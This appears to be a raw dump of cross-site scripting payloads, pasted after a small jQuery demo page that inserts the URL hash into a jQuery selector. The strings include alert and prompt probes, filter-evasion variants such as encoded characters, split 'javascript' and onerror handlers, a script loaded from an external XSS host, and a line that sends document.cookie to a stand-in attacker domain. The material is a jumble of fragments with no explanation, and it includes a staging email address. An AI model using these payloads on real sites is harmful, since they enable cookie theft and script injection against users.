<script src="../js/jquery-1.7.1.js"></script>
<script>
function setMessage(){
var t=location.hash.slice(1);
$("div[id="+t+"]").text("The DOM is now loaded and can be manipulated.");
}
$(document).ready(setMessage );
$(window).bind("hashchange",setMessage)
</script>
<body><script src="../js/embed.js"></script>
<span><a href="#message" > Show Here</a><div id="message">Showing Message1</div></span>
<span><a href="#message1" > Show Here</a><div id="message1">Showing Message2</div>
<span><a href="#message2" > Show Here</a><div id="message2">Showing Message3</div>
</body>
<script>alert('XSS')</script>
<script>var img = new Image();
img.src="http://some.evilhacker.net/index.php?cookies="+document.cookie</script>
<html><title>Welcome<title>h1<script>alert(document.cookies)</script></html>
rajdilawar.chandehok+25082016staging@catchall.softgarden.de
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext></|><plaintext/onmouseover=prompt(1)>
<script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script>
<script>alert(document.cookie)</script>">
<img/id="confirm(1)"/alt="/"src="/"onerror=eval(id)>'">
<img src="http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg">
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<img src=x onerror="javascript:alert('XSS')">
<IMG SRC="jav ascript:alert('XSS');">